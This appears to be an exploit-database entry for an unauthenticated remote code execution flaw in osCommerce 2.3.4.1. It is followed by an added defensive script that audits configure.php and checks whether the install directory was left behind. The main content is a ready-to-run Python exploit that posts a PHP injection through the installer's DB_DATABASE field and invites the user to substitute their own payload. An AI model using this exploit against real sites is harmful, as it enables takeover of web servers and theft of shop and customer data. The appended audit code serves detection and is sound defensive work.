
osCommerce 2.3.4.1 Remote Code Execution

Date: 31 Mar 2018
Reported by: Simon Scannell
Type: packetstorm
Source: packetstormsecurity.com

osCommerce 2.3.4.1 RCE via install.ph

Code
```python
# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <[email protected]>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.


import requests

# enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("ls");'  # this is where you enter your PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
```
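For the defensive side of the flaw described in the header comments, the following added example (not part of the original advisory or of osCommerce) checks whether the `install` directory is still present and audits a `configure.php` for lines that are not a plain `define()` with a literal value. The function names, the accepted line shape and both sample files are assumptions constructed for illustration.

```python
import os
import re

# Assumed shape of a line the installer writes: define('NAME', <literal>);
# A quoted value may not contain ' or \, so a value that closes the string
# early and appends statements (the flaw described above) cannot match.
DEFINE_LINE = re.compile(
    r"^\s*define\('([A-Z_][A-Z0-9_]*)',\s*(?:'[^'\\]*'|true|false|\d+)\);\s*$"
)


def audit_configure(text):
    """Return (line_number, line) for each line that is not a plain define()."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped in ("", "<?php", "?>"):
            continue
        if not DEFINE_LINE.match(line):
            findings.append((number, stripped))
    return findings


def install_dir_present(catalog_root):
    """True if the installer directory was left in place under the catalog."""
    return os.path.isdir(os.path.join(catalog_root, "install"))


# Constructed sample of a clean configure.php (values are placeholders).
CLEAN = """<?php
  define('HTTP_SERVER', 'http://shop.example');
  define('DB_DATABASE', 'oscommerce');
  define('USE_PCONNECT', 'false');
?>"""

# Constructed sample: the same file after the DB_DATABASE value from the
# script above has been written into it.
TAMPERED = CLEAN.replace("'oscommerce'", "'');system(\"ls\");/*'")

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, audit_configure(sample))
```

Flagged lines are candidates for manual review, not proof of compromise: a legitimate value containing a backslash or quote (for example a Windows path) is also reported by this strict pattern.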
